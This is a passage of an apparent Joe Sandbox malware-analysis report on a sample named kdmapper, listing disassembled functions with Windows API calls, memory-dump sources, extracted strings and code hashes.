                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0063B67E
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0063B694
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                                          • String ID: LICENSEDLG
                                                                                                                                                                          • API String ID: 3214253823-2177901306
                                                                                                                                                                          • Opcode ID: 9ca0f2ba0665fb34210e827e0249159e8604ed2fc559f5464371aa82b8b35828
                                                                                                                                                                          • Instruction ID: 1836e6c4463e972bf78f8774690ab6c2192e2ece35ba30c7aa51c044968bd14c
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ca0f2ba0665fb34210e827e0249159e8604ed2fc559f5464371aa82b8b35828
                                                                                                                                                                          • Instruction Fuzzy Hash: 6821F332204225BBD3119F65ED4AF7B3B6FEB47F45F012018F704A62A2CB92990197B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,F0DD8672,00000001,00000000,00000000,?,?,0062AF6C,ROOT\CIMV2), ref: 0063FD99
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0062AF6C,ROOT\CIMV2), ref: 0063FE14
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0063FE1F
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 0063FE48
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 0063FE52
                                                                                                                                                                          • GetLastError.KERNEL32(80070057,F0DD8672,00000001,00000000,00000000,?,?,0062AF6C,ROOT\CIMV2), ref: 0063FE57
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 0063FE6A
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?,0062AF6C,ROOT\CIMV2), ref: 0063FE80
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 0063FE93
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1353541977-0
                                                                                                                                                                          • Opcode ID: 981e0cb576babb2864dab717d92f6e2950be4faec889818b76f12735956a6277
                                                                                                                                                                          • Instruction ID: aa97ab7b04181cd1883bb9c17f27cb23f7a39ff4aee1dfeed967b0fd37ac7680
                                                                                                                                                                          • Opcode Fuzzy Hash: 981e0cb576babb2864dab717d92f6e2950be4faec889818b76f12735956a6277
                                                                                                                                                                          • Instruction Fuzzy Hash: 84419471E00315ABDB109F65D845BAFBBAAEF44B51F10423AF905E73A1DB34990087E5
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00629387
                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 006293AA
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 006293C9
                                                                                                                                                                            • Part of subcall function 0062C29A: _wcslen.LIBCMT ref: 0062C2A2
                                                                                                                                                                            • Part of subcall function 00631FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0062C116,00000000,.exe,?,?,00000800,?,?,?,00638E3C), ref: 00631FD1
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00629465
                                                                                                                                                                            • Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 006294D4
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00629514
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                          • String ID: rtmp%d
                                                                                                                                                                          • API String ID: 3726343395-3303766350
                                                                                                                                                                          • Opcode ID: c0bbdd02465a59d61fceb45ac22dbd47d71402d388892719e1bce2e3aee6fd69
                                                                                                                                                                          • Instruction ID: 17f4e283d0a8087833957a69641cab2a04bf4ec8749a2fec23e49cdb7e1076e7
                                                                                                                                                                          • Opcode Fuzzy Hash: c0bbdd02465a59d61fceb45ac22dbd47d71402d388892719e1bce2e3aee6fd69
                                                                                                                                                                          • Instruction Fuzzy Hash: BE41B671900674A6DF61EFA0EC45EDE737EAF81340F0048A9B609F3151DA388B898F74
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: Uc$pc$zc
                                                                                                                                                                          • API String ID: 176396367-3486765131
                                                                                                                                                                          • Opcode ID: 68de902099b8a6b1dc08f9002ad61cab3be1a9f83676a736b1846e38644366dd
                                                                                                                                                                          • Instruction ID: 169948fffabace6d28b0c6edbb19540c99fbb6535d43d16e5a231c352332c448
                                                                                                                                                                          • Opcode Fuzzy Hash: 68de902099b8a6b1dc08f9002ad61cab3be1a9f83676a736b1846e38644366dd
                                                                                                                                                                          • Instruction Fuzzy Hash: C641C3719016799BCB619F689C0A9DF7BB9EF11710F00011EF946EB345DA30AE498BA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00639EEE
                                                                                                                                                                          • GetWindowRect.USER32(?,00000000), ref: 00639F44
                                                                                                                                                                          • ShowWindow.USER32(?,00000005,00000000), ref: 00639FDB
                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00639FE3
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00639FF9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Show$RectText
                                                                                                                                                                          • String ID: c$RarHtmlClassName
                                                                                                                                                                          • API String ID: 3937224194-2308181962
                                                                                                                                                                          • Opcode ID: 0f65ad5fa1ef8cdf13642a60f1087ff7abf5262ccb2baad988bb940a2dd2c364
                                                                                                                                                                          • Instruction ID: 0f9fea9051d4903e27b73e0bea710acfb31a979a5e6d1c32e2eb8a1c8434f2eb
                                                                                                                                                                          • Opcode Fuzzy Hash: 0f65ad5fa1ef8cdf13642a60f1087ff7abf5262ccb2baad988bb940a2dd2c364
                                                                                                                                                                          • Instruction Fuzzy Hash: 9741A231004220BFCB219FA4DC8CBAB7BAAFF48B05F00465DF98999256DB74D905CFA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0063122E
                                                                                                                                                                            • Part of subcall function 0062B146: GetVersionExW.KERNEL32(?), ref: 0062B16B
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00631251
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00631263
                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00631274
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00631284
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00631294
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 006312CF
                                                                                                                                                                          • __aullrem.LIBCMT ref: 00631379
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1247370737-0
                                                                                                                                                                          • Opcode ID: f263d1df44a856e60bd97950ec494cf76b6058f27b2feda5877677b032ef882f
                                                                                                                                                                          • Instruction ID: 63661b8a7ce8af076b751d312522b45bd4b9e8eb2b00aa71cab90b655f279901
                                                                                                                                                                          • Opcode Fuzzy Hash: f263d1df44a856e60bd97950ec494cf76b6058f27b2feda5877677b032ef882f
                                                                                                                                                                          • Instruction Fuzzy Hash: 844126B1508305AFD710DF65C88496BBBFAFF88715F00892EF596C6210E734E659CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00622536
                                                                                                                                                                            • Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5
                                                                                                                                                                            • Part of subcall function 006305DA: _wcslen.LIBCMT ref: 006305E0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                          • String ID: ;%u$x%u$xc%u
                                                                                                                                                                          • API String ID: 3053425827-2277559157
                                                                                                                                                                          • Opcode ID: 6a9936d9b121d6a6dd33d83a33b890000ca722f08c8cb09aceb1313d8998c9a5
                                                                                                                                                                          • Instruction ID: 72167cdb4e6ef471a70f38bad89f230912a02c3b7ef194690650d43f0a92bbb6
                                                                                                                                                                          • Opcode Fuzzy Hash: 6a9936d9b121d6a6dd33d83a33b890000ca722f08c8cb09aceb1313d8998c9a5
                                                                                                                                                                          • Instruction Fuzzy Hash: DDF13B71604B61ABCB24DB24A4A57FE779B6F90300F08456DFC869B343CB648949CF66
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                                                          • API String ID: 176396367-3568243669
                                                                                                                                                                          • Opcode ID: 43bf4583747f8ac6ed1a122f06069483d2111de8fc67b89093d3404368b8764f
                                                                                                                                                                          • Instruction ID: 8bb32e3d4002b168daf943dfa37660965b140a16d1b19b3f49d24cc5f76f4428
                                                                                                                                                                          • Opcode Fuzzy Hash: 43bf4583747f8ac6ed1a122f06069483d2111de8fc67b89093d3404368b8764f
                                                                                                                                                                          • Instruction Fuzzy Hash: 2351F56664472395DB30AA2598127F673E3DFA1750F69041AE9C18B3C0FBE58C818AF5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0064FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0064F6CF
                                                                                                                                                                          • __fassign.LIBCMT ref: 0064F74A
                                                                                                                                                                          • __fassign.LIBCMT ref: 0064F765
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0064F78B
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,0064FE02,00000000,?,?,?,?,?,?,?,?,?,0064FE02,00000000), ref: 0064F7AA
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000001,0064FE02,00000000,?,?,?,?,?,?,?,?,?,0064FE02,00000000), ref: 0064F7E3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                          • Opcode ID: d918e1ae5642c8a8734f284fd06d3c5d0e468165dbdd332c290f046c76e5ec7e
                                                                                                                                                                          • Instruction ID: cfd3d451581b6b6ac052c6a7d2d988c58d1a4ade0da5f663da14866b41b7feb6
                                                                                                                                                                          • Opcode Fuzzy Hash: d918e1ae5642c8a8734f284fd06d3c5d0e468165dbdd332c290f046c76e5ec7e
                                                                                                                                                                          • Instruction Fuzzy Hash: B651B4B1D00209AFCB10CFA8DC85AEEBBF6EF09310F15416AE555E7391D731AA41CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000800,?), ref: 0063CE9D
                                                                                                                                                                            • Part of subcall function 0062B690: _wcslen.LIBCMT ref: 0062B696
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063CED1
                                                                                                                                                                            • Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,0066946A), ref: 0063CEF1
                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 0063CF22
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0063CFFE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                                                                                          • String ID: %s%s%u
                                                                                                                                                                          • API String ID: 689974011-1360425832
                                                                                                                                                                          • Opcode ID: bcfba4385525bccc45a56dae57e4d57c3147dc3d0a5654532300c92f5814f4d3
                                                                                                                                                                          • Instruction ID: dc6b84c2422ca1c9a8c260f7de1df8e56d9b661fd4756387d2eebc6140919e84
                                                                                                                                                                          • Opcode Fuzzy Hash: bcfba4385525bccc45a56dae57e4d57c3147dc3d0a5654532300c92f5814f4d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 224191B1800618AADF25DBA0DC45EEA77FEEF05750F4080AAF909E7141EF709A44CFA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00642937
                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0064293F
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 006429C8
                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 006429F3
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00642A48
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                          • Opcode ID: 05513d6d7b7a8fda6fe8fc5b8caae5f7e795d2bd282fffca0362cd53437747d8
                                                                                                                                                                          • Instruction ID: f08da07ad860b2bf79ead5ddae2b8ea357b7fadfa890c5bbedc72617cc899085
                                                                                                                                                                          • Opcode Fuzzy Hash: 05513d6d7b7a8fda6fe8fc5b8caae5f7e795d2bd282fffca0362cd53437747d8
                                                                                                                                                                          • Instruction Fuzzy Hash: D141C530A0021AAFCF10DF69C895ADE7BB7AF44324F648159FC15AB392D731DA55CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                          • API String ID: 176396367-3743748572
                                                                                                                                                                          • Opcode ID: 0bd1930e04fd68adf894e96e2b399dd4d83a85fde6538d99cadb3ade91ad2e4e
                                                                                                                                                                          • Instruction ID: b758be6a59f7cf5bdfe4746a51da8793e50995b30fc41dc4d5115f4f8ae1ab41
                                                                                                                                                                          • Opcode Fuzzy Hash: 0bd1930e04fd68adf894e96e2b399dd4d83a85fde6538d99cadb3ade91ad2e4e
                                                                                                                                                                          • Instruction Fuzzy Hash: F7315B3264434656DB30AB549C42BBA73E6EB90720F50451FF882473C0FBE0AD8587F5
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0064C868: _free.LIBCMT ref: 0064C891
                                                                                                                                                                          • _free.LIBCMT ref: 0064C8F2
                                                                                                                                                                            • Part of subcall function 00648DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34), ref: 00648DE2
                                                                                                                                                                            • Part of subcall function 00648DCC: GetLastError.KERNEL32(00653A34,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34,00653A34), ref: 00648DF4
                                                                                                                                                                          • _free.LIBCMT ref: 0064C8FD
                                                                                                                                                                          • _free.LIBCMT ref: 0064C908
                                                                                                                                                                          • _free.LIBCMT ref: 0064C95C
                                                                                                                                                                          • _free.LIBCMT ref: 0064C967
                                                                                                                                                                          • _free.LIBCMT ref: 0064C972
                                                                                                                                                                          • _free.LIBCMT ref: 0064C97D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
